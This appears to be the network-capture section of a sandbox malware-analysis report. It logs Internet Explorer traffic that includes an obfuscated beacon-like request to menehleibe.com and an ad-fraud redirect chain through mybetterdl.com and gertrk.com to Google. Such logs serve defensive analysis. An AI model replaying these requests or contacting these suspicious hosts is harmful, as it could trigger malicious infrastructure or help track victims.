<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="http://www.google.com/">here</A>.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.6	49749	142.250.102.106	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Sep 14, 2021 16:03:24.290153980 CEST	1071	OUT	GET / HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Connection: Keep-Alive Host: www.google.com
Sep 14, 2021 16:03:24.355325937 CEST	1072	IN	HTTP/1.1 302 Found Location: https://www.google.com/?gws_rd=ssl Cache-Control: private Content-Type: text/html; charset=UTF-8 Date: Tue, 14 Sep 2021 14:03:24 GMT Server: gws Content-Length: 231 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 3f 67 77 73 5f 72 64 3d 73 73 6c 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/?gws_rd=ssl">here</A>.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.6	49743	168.119.139.96	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.6	49744	168.119.139.96	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.6	49746	168.119.139.96	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.6	49751	142.250.102.106	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.6	49752	142.250.102.106	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.6	49755	142.250.102.106	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.6	49757	142.250.102.106	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.6	49737	173.239.8.164	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Sep 14, 2021 16:03:19.921633005 CEST	1024	OUT	GET /images/bjM3gVEtKlUeWm2NnKw3/UycpbcugJuZhqNGVGh8/kwk4esZ_2F2xjDYD_2BSa_/2F328cjxY6AQM/kA5SneVc/JKL1AVTBXoV77D1JaKVgbri/d8lSYHOR5C/_2FOPoUzuMMso_2Bp/A_2Ffbx4wppa/aSm6IWIjM6R/Y44GbYY.avi HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: menehleibe.com Connection: Keep-Alive
Sep 14, 2021 16:03:20.024328947 CEST	1024	IN	HTTP/1.1 302 Moved Temporarily Server: nginx/1.18.0 Date: Tue, 14 Sep 2021 14:03:19 GMT Content-Type: text/html Content-Length: 145 Connection: keep-alive Location: http://menehleibe.com/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx/1.18.0</center></body></html>
Sep 14, 2021 16:03:20.027059078 CEST	1024	OUT	GET / HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: menehleibe.com Connection: Keep-Alive
Sep 14, 2021 16:03:20.137682915 CEST	1025	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 14 Sep 2021 14:03:20 GMT Content-Type: text/html;charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Content-Encoding: gzip Data Raw: 66 38 0d 0a 1f 8b 08 00 00 00 00 00 04 03 7d 90 bd 6e c3 30 0c 84 f7 3c 85 a0 29 19 6a 75 c9 d0 96 d6 50 a0 43 81 be 43 20 4b 74 44 40 7f 95 a9 04 7e fb ca 49 d0 a1 43 37 1e 70 c7 fb 48 f0 1c 83 06 8f c6 69 88 c8 46 78 e6 f2 84 df 8d 2e a3 ac 38 57 5c bc 14 36 27 c6 c4 a3 3c be 89 56 c3 b8 99 5e 95 ba 5e 5f 86 88 09 7d 40 9a 70 b0 39 2a a9 81 89 03 ea af 6c 1c a5 33 a8 bb 04 75 eb d8 c1 94 dd aa 61 ce 35 8a de e7 b3 1b 65 c9 0b 4b 61 2c 53 4e a3 7c ec fe bb 57 b0 a9 67 ec 08 27 ce 45 0a ea b9 3a f7 36 4a a5 b1 e0 b5 60 8f 92 73 98 a4 48 26 76 45 56 8a 8b 09 ad 8f cf ff 1a e7 e9 d7 c8 b5 a1 54 1a d4 06 a8 77 b0 d8 4a 85 b5 cb b6 75 20 1e 3a c1 47 c0 6d 7c 5f 3f dd 7e 43 38 0c 4b 9b 22 f1 fe 00 ea 61 07 75 bf 52 dd be fb 03 9f 2c e3 4e 64 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f8}n0<)juPCC KtD@~IC7pHiFx.8W\6'<V^^_}@p9*l3ua5eKa,SN\|Wg'E:6J`sH&vEVTwJu :Gm\|_?~C8K"auR,Nd0
Sep 14, 2021 16:03:20.611062050 CEST	1025	OUT	POST / HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Referer: http://menehleibe.com/ Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Host: menehleibe.com Content-Length: 12 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 69 63 3d 30 26 66 62 3d 74 72 75 65 Data Ascii: ic=0&fb=true
Sep 14, 2021 16:03:21.647305965 CEST	1027	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 14 Sep 2021 14:03:21 GMT Content-Type: text/html;charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: ipc=eyJ2ZXJzaW9uIjoxLCJzdWJJZCI6MywiZm9sZGVySWQiOjEsImZlZWRJZCI6MjEsInRzIjoxNjMxNjI4MjAxLCJoYXNoIjoiN2E3ZmJiNTgifQ==;Expires=Tue, 14-Sep-2021 15:03:21 GMT;Max-Age=3600 Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Encoding: gzip Data Raw: 35 32 32 0d 0a 1f 8b 08 00 00 00 00 00 04 03 35 95 b7 d2 ab 58 02 84 f3 7d 8a a9 9b 4c c4 fc b8 83 99 d5 fd b7 00 21 40 08 e1 6d a2 c2 7b 23 38 08 f3 f4 7b 6b 4c d8 1d 74 57 75 f0 f5 a5 82 7d f7 7d a9 f2 38 fb be f4 39 8c 7f 1b e2 3e ff f9 63 ce 8b 7c 9e f3 f9 c7 6f e9 38 c0 7c 80 3f 7f 0c 23 f2 af 8b 6c 55 3e 20 d9 b8 0d e5 1c 67 f9 8f ef 0b ac 61 97 7f 3f c6 38 ab 87 f2 f2 f5 b7 bc 7c fd 95 fb 9f 4b 32 66 c7 f7 65 49 e7 7a 82 df dd 98 c6 b0 1e 87 3f aa 5f 71 3f 7f af 20 9c 96 3f bf be fa 23 c9 21 cc e7 ac fb 23 1d fb af d8 fe 2a f2 3c 4b bb 3a 6d ff b7 fc 34 7a 4b 4b 01 2d 0c 55 58 35 34 9a 23 0a db 1e a0 2d ee f9 ac 56 db de 15 b6 e6 12 f0 58 f7 d7 0e 38 29 9a 7d d7 b0 ef bd 71 3e f1 94 2d 70 91 7e 7d b8 27 42 4d 8c 34 f5 d7 48 62 1c 61 75 22 6a ba 8e e2 d6 1d f1 84 b7 d1 52 9e 3c d9 c9 28 ba 96 4c 0e c4 5d 39 17 44 e2 8f 7b bb bd aa 61 7c c8 be e7 3e f0 32 28 dd 23 86 0b 7f d3 62 db 49 31 cb 04 d6 de 9a 06 ff 3e 0e 67 20 52 18 3c 8f 17 ba da b2 65 ef 6d af 1f 8c 27 6b 29 03 24 45 77 c8 a6 5f 72 46 4e 47 e4 36 69 5d c2 5a f2 0e 28 6f 6f 9e b8 09 6f 4f 8c a5 3f 8f b9 68 23 f6 2d 02 94 85 20 b6 c2 a2 45 0b 27 8e 14 69 93 a0 77 db 29 a1 49 31 05 32 1f d5 1b 33 05 37 47 61 78 e4 8f f5 e4 df fb 6c 87 72 3d 1c 96 52 5b 94 7d 3a 41 cc 17 ac 21 53 45 0a 08 46 03 be f8 d1 3e 55 13 af ae 2c ad 49 c3 52 d8 4c 03 d5 6d 54 68 07 83 1c 43 f9 2d ae f5 b1 3a da e1 37 d6 d1 08 aa 26 09 eb 1c d9 cc 2b 49 dd 98 84 f7 b2 ad 9d 23 c8 04 d0 be 4c 52 e0 d7 53 ac 4a b5 1b 5f 50 27 23 61 6f 84 77 b2 df 5b 60 9e bf a6 d2 b6 6d 11 d5 2d 46 f8 ea 35 ad 1b 4e a1 b2 18 fa 72 22 73 7b 55 49 59 77 d7 10 e5 05 b1 7d af bc 0f 61 9b 7d 82 af 5b c2 02 ab 93 34 9a 7b 4f ba ec 79 37 4a 2c 8d 16 92 31 00 da 11 79 43 b0 7a 6d 39 bb 1d 16 b7 9e 9e d6 75 a5 74 ef 38 1a ed 31 c7 c3 ee 9c 69 d4 bf bd cb 99 e2 aa 31 4e 4c 9b 3f 85 66 bd 87 cf 89 2c 37 37 f4 50 cf ff 58 51 dc f4 ae af bf bc 7d 64 b4 07 52 35 ee 32 1b 32 83 fe 6a 74 fb eb be 86 e4 87 a9 07 71 1c 91 03 79 0f 87 8b 52 13 ee 56 84 b1 b1 61 f6 0c af 80 51 54 52 50 05 29 e5 10 37 ee d9 2c 5d 16 c4 41 80 b2 26 e4 1d 03 32 45 6f b7 08 5f 86 f3 f4 27 ff 14 55 81 0d 5c dd 1a f3 57 96 0c 62 c9 55 f2 fe 1a e8 88 84 9e 1e 66 3e e8 7c 6a 5e af c6 3b ce e5 14 5d cf d4 71 d9 a4 ec 5f f5 80 f8 78 07 3e e3 bc 1b b7 de 8c 9d 9b 92 1e 24 0f ca 55 1f b4 3b 38 22 f9 61 5e 01 4d ed a1 9f 18 28 11 6b 0c 91 39 9b 48 b4 da 34 9c 82 80 79 80 47 88 2a c8 c0 74 16 3b 46 4b 76 e4 ae b8 2a 07 4a 3f 76 47 3b f7 4e 7c 4a 91 da 6b 7c 25 82 f9 8c 6b 92 b3 82 b2 73 34 ba 33 b8 4e 59 96 ac 29 87 4e 2f 79 3d f1 86 07 95 69 f3 d3 f0 c8 ed 48 bd 80 58 80 be c3 bb 16 e4 99 e0 8b f8 0c 92 fa a9 a7 01 71 00 a3 df 10 94 77 33 3e Data Ascii: 5225X}L!@m{#8{kLtWu}}89>c\|o8\|?#lU> ga?8\|K2feIz?_q? ?#!#<K:m4zKK-UX54#-VX8)}q>-p~}'BM4Hbau"jR<(L]9D{a\|>2(#bI1>g R<em'k)$Ew_rFNG6i]Z(oooO?h#- E'iw)I1237Gaxlr=R[}:A!SEF>U,IRLmThC-:7&+I#LRSJ_P'#aow[`m-F5Nr"s{UIYw}a}[4{Oy7J,1yCzm9ut81i1NL?f,77PXQ}dR522jtqyRVaQTRP)7,]A&2Eo_'U\WbUf>\|j^;]q_x>$U;8"a^M(k9H4yGt;FKv*J?vG;N\|Jk\|%ks43NY)N/y=iHXqw3>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49739	173.192.101.24	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-14 14:03:22 UTC	0	OUT	GET /aS/feedclick?s=PmRMc57CnhYhj70e-I9ky5kfJerKhwxlfSMU3tyux_x5AGZrWUPSJmPzN2c9f2E7_vAN-6p8GpmDZG8TCuTZ6pDoEwlyap2kZsgzB4lH00ug8e5ExIzs-GByJkw_hnoLHWVUL2gXgUyatsBFMaSTc1RQ5RxkQPBqyyTn3ctXNy_0uSHRSxkmOy8VHMc85GIOT4jmse8Hco-FpMlb9RHx56VxjN2QtFN197vLrfkZ9qE509t5aRYfk0fTaZIGwGtVFx6Cjc1It8vKVodI2QoCnLeLuzBqxrSYHinyRIiR6SzTXaBf9PH6fc538M5WEvMvhjauUHGubj961r75KUjKtSXnHatHqEuiyuTMyWjRyjCKMGCurZS8_bcUa4tJgkiTyXdC5k_Q4CBuzEhgKlo_tO4ZCxjCqbxJk5Qzkw_MwwsEKwa-Bh_puw260HEYWHbHAxhhGdlJM-I_t1xxhVv3SQmb2uwb95RlGM7AqpOHVVF6EgPkt4a55MyZVnXuVkgrUl1akVOciihIlqaZoSoe2Ylzr70WFqgr6AhoabQSBzCjuJYNp4gwUYV0VWvRZajmUWO_Vxo8ML-hjUsrPH807AqUmDxuY4v8inEoo-y-qnyU06p2Uh3Pw9YdNYD58IK4CKCGcA-Uam9dcss-T-5Iub4J15H67wFZ2snzzWpWzEKC9XUORoe_dbnEgAhHx_n7Z4tVOYdW5lW6ruDPqaeHc0uzcTU9bgm_in-W2l5vorxPFmQaTFIcy4B5guOnMJ5yZHLQD576xYWbP03aM83dTwE3kMpnzCC1V5B-3hXd5pzfx17GSZUu2KHXImolykrmTazGZKmMBhE5rzai4ARXglTM7lPAlIssdjgnlOgBObVnL6dMrNPV4wycVX3s5OxtJMXedCWE2r5biNOcX3y5Pmw-0BUdBZv7MvlSTP2Fk9AaabOem2Q73GpjsG_dwXVnUc2FH6zZuqWu2Dli66C-XucADfX2tBPlR3prQOfp40mttv00_iCR6q6fLI9QZgGY11WgfO3qdEgV2xwoj0eGTIxBicwTEMicE9X3AYQsCpAEn3pdnGSoQpHTA7Kz9fo94mKnTULy2teQgTesP9hhxLreOeHrbCzwHSSbH-FJZx15JZAYCxI8gV6bvS4IWlDg_vysGgTqrjiFCjhA5kocz54NYxtQVvyXSZspRWMKjI1QYN8ennj2JVFvWfYyzeLbGr1ovqBCtNBvJi2ztcTgBlsW0SM8XIsRgd4QMcWZcycyUPzb9Wd1bDxFTAWmSXH43ynD5UObBi5FyNDw8qKKmoCnfedHiztWYQxKotKUGaKd1m_k2iMIc5SBU1Vi7-MGW4_Mi4WYIzJL61eBLaioPhng2BQ6PDt8aAWdDMho29RkRFHVPIQb3W3nWMGo8srLOHYnfrFRuEDgcm6cqkr2IQD0T7sB-GexA77NdWEi2cdlkkLEB146pQ HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Referer: http://menehleibe.com/ Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: mybetterdl.com Connection: Keep-Alive
2021-09-14 14:03:22 UTC	1	IN	HTTP/1.1 302 Server: nginx Date: Tue, 14 Sep 2021 14:03:22 GMT Content-Length: 0 Connection: close Set-Cookie: rhid=79630578833; Max-Age=15552000; Expires=Sun, 13-Mar-2022 14:03:22 GMT; Domain=mybetterdl.com; Path=/; SameSite=None; secure; Location: https://p226681.mybetterdl.com/adServe/domainClick?ai=qR193HoKV_skvRDJ1Xl7Z2EMSqLSlBmindZv5NojCHOwn03uCMUnWWP1f_rG7YbjKg1peh-_obzBIj3uZHPpnj9EVoFzCvr6nUsZVZhWVPP-29LJmEHdmZ7b6Qy9a1mHTiLNxNNj-331YCaynPT02WREUdU8hBvdAVtzW-BnG_JiVnQIGgxQDiU7ugF2M-yuSZspRWMKjI0oZaL4_NY6BA8B78vhYDGtjMUdyxHqWTbxnarhY6PRQCoyupr1mhPBjhdEqJB6Nj2XmDvYXWw9hp-qFZn5gpnPqtE9sbJicJwX2fEbVjxB9kp2QAzznS8_6fjhgUFt3sQISiZ3D8mF7LCm2HeI0S938_gGwpSXr3tSAMcY_H2x07HFovOGSDpNKiXhLmiyflhHQ2DhJtv57Pgpt-TBvcxCEwrLEAaOW_go6oM85zEqQcFJgSFbjHo8VjLddbnKrYw&ui=PmRMc57CnhbNSfHhL5kCGmvi5v6ZZrF7dLiTNq3P25qokS0sVeF3FkXI0PDyooqap4CS6zytrLbvtEDBZZLJWA-odODn3W3LTPqV0hvm1VqP--qZkGGf_8AXd3hExnhV&si=1&oref=a606ca39dc85b39bdaa2bf88832fa198&optunit=SZspRWMKjI3Y6yHw-JV9WQ&rb=mhdAWEBiphk&rr=1&abtg=0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.6	49741	173.192.101.24	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-14 14:03:23 UTC	2	OUT	GET /adServe/domainClick?ai=qR193HoKV_skvRDJ1Xl7Z2EMSqLSlBmindZv5NojCHOwn03uCMUnWWP1f_rG7YbjKg1peh-_obzBIj3uZHPpnj9EVoFzCvr6nUsZVZhWVPP-29LJmEHdmZ7b6Qy9a1mHTiLNxNNj-331YCaynPT02WREUdU8hBvdAVtzW-BnG_JiVnQIGgxQDiU7ugF2M-yuSZspRWMKjI0oZaL4_NY6BA8B78vhYDGtjMUdyxHqWTbxnarhY6PRQCoyupr1mhPBjhdEqJB6Nj2XmDvYXWw9hp-qFZn5gpnPqtE9sbJicJwX2fEbVjxB9kp2QAzznS8_6fjhgUFt3sQISiZ3D8mF7LCm2HeI0S938_gGwpSXr3tSAMcY_H2x07HFovOGSDpNKiXhLmiyflhHQ2DhJtv57Pgpt-TBvcxCEwrLEAaOW_go6oM85zEqQcFJgSFbjHo8VjLddbnKrYw&ui=PmRMc57CnhbNSfHhL5kCGmvi5v6ZZrF7dLiTNq3P25qokS0sVeF3FkXI0PDyooqap4CS6zytrLbvtEDBZZLJWA-odODn3W3LTPqV0hvm1VqP--qZkGGf_8AXd3hExnhV&si=1&oref=a606ca39dc85b39bdaa2bf88832fa198&optunit=SZspRWMKjI3Y6yHw-JV9WQ&rb=mhdAWEBiphk&rr=1&abtg=0 HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Referer: http://menehleibe.com/ Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Connection: Keep-Alive Host: p226681.mybetterdl.com Cookie: rhid=79630578833
2021-09-14 14:03:23 UTC	3	IN	HTTP/1.1 302 Server: nginx Date: Tue, 14 Sep 2021 14:03:23 GMT Content-Length: 0 Connection: close Set-Cookie: rhid=79630578833; Max-Age=15552000; Expires=Sun, 13-Mar-2022 14:03:23 GMT; Domain=mybetterdl.com; Path=/; SameSite=None; secure; Set-Cookie: loi=ad_1007735_off_459698_aff_88561_cid_226681-MENEHLEIBE.COM_ts_1631628203; Max-Age=3600; Expires=Tue, 14-Sep-2021 15:03:23 GMT; Domain=mybetterdl.com; Path=/; SameSite=None; secure; Location: https://gertrk.com/click.php?key=qxr7sx5xq96osnrqgm1a&subid=87057224030&bid=0.025&site=413999995&source=413999995&clickid=87057224030&browser=Internet+Explorer+11&geo=CH&campaign_name=CH&device=Desktop&os=Windows+10

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.6	49743	168.119.139.96	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-14 14:03:23 UTC	4	OUT	GET /click.php?key=qxr7sx5xq96osnrqgm1a&subid=87057224030&bid=0.025&site=413999995&source=413999995&clickid=87057224030&browser=Internet+Explorer+11&geo=CH&campaign_name=CH&device=Desktop&os=Windows+10 HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Referer: http://menehleibe.com/ Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Connection: Keep-Alive Host: gertrk.com
2021-09-14 14:03:23 UTC	4	IN	HTTP/1.1 302 Found Server: nginx/1.18.0 Date: Tue, 14 Sep 2021 14:03:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: uclick=16bzxofy; expires=Wed, 15-Sep-2021 14:03:23 GMT; Max-Age=86400; path=/; secure; SameSite=none Set-Cookie: uclickhash=16bzxofy-16bzxofy-h9-0-ci-wh-4p-268f1c; expires=Wed, 15-Sep-2021 14:03:23 GMT; Max-Age=86400; path=/; secure; SameSite=none Location: https://gertrk.com/nlp/index.php?url_bnm_redirect=http://google.com Strict-Transport-Security: max-age=31536000
2021-09-14 14:03:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.6	49744	168.119.139.96	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-14 14:03:23 UTC	5	OUT	GET /nlp/index.php?url_bnm_redirect=http://google.com HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Referer: http://menehleibe.com/ Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Connection: Keep-Alive Host: gertrk.com Cookie: uclick=16bzxofy; uclickhash=16bzxofy-16bzxofy-h9-0-ci-wh-4p-268f1c
2021-09-14 14:03:23 UTC	5	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 14 Sep 2021 14:03:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Strict-Transport-Security: max-age=31536000
2021-09-14 14:03:23 UTC	6	IN	Data Raw: 33 65 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 55 52 4c 3d 20 68 74 74 70 3a 2f 2f 67 6f 6f 67 6c 65 2e 63 6f 6d 22 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 3e<meta http-equiv="refresh" content="0;URL= http://google.com">0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.6	49746	168.119.139.96	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-14 14:03:24 UTC	6	OUT	GET /favicon.ico HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: gertrk.com Connection: Keep-Alive Cookie: uclick=16bzxofy; uclickhash=16bzxofy-16bzxofy-h9-0-ci-wh-4p-268f1c
2021-09-14 14:03:24 UTC	6	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 14 Sep 2021 14:03:24 GMT Content-Type: image/x-icon Content-Length: 5638 Last-Modified: Thu, 30 Aug 2018 21:25:42 GMT Connection: close ETag: "5b8860d6-1606" Strict-Transport-Security: max-age=31536000 Accept-Ranges: bytes
2021-09-14 14:03:24 UTC	6	IN	Data Raw: 00 00 01 00 01 00 27 22 00 00 01 00 20 00 f0 15 00 00 16 00 00 00 28 00 00 00 27 00 00 00 44 00 00 00 01 00 20 00 00 00 00 00 b8 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 3b 4c e6 ff 3b 4c e6 ff 3b 4c e6 ff 3b 4c e6 ff 3b 4c e6 ff 3b 4c e6 ff 00 00 00 00 00 00 00 00 19 c3 ef ff 19 Data Ascii: '" ('D ;L;L;L;L;L;L

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.6	49751	142.250.102.106	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-14 14:03:24 UTC	12	OUT	GET /?gws_rd=ssl HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Connection: Keep-Alive Host: www.google.com
2021-09-14 14:03:24 UTC	12	IN	HTTP/1.1 200 OK Date: Tue, 14 Sep 2021 14:03:24 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: CONSENT=PENDING+509; expires=Fri, 01-Jan-2038 00:00:00 GMT; path=/; domain=.google.com; Secure Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2021-09-14 14:03:24 UTC	13	IN	Data Raw: 33 34 62 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 47 42 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 67 2f 31 78 2f 67 6f 6f 67 6c 65 67 5f 73 74 61 6e 64 61 72 64 5f 63 6f 6c 6f 72 5f 31 32 38 64 70 2e 70 6e 67 22 20 69 74 65 6d 70 72 6f 70 3d 22 69 6d 61 67 65 Data Ascii: 34bd<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en-GB"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta content="/images/branding/googleg/1x/googleg_standard_color_128dp.png" itemprop="image
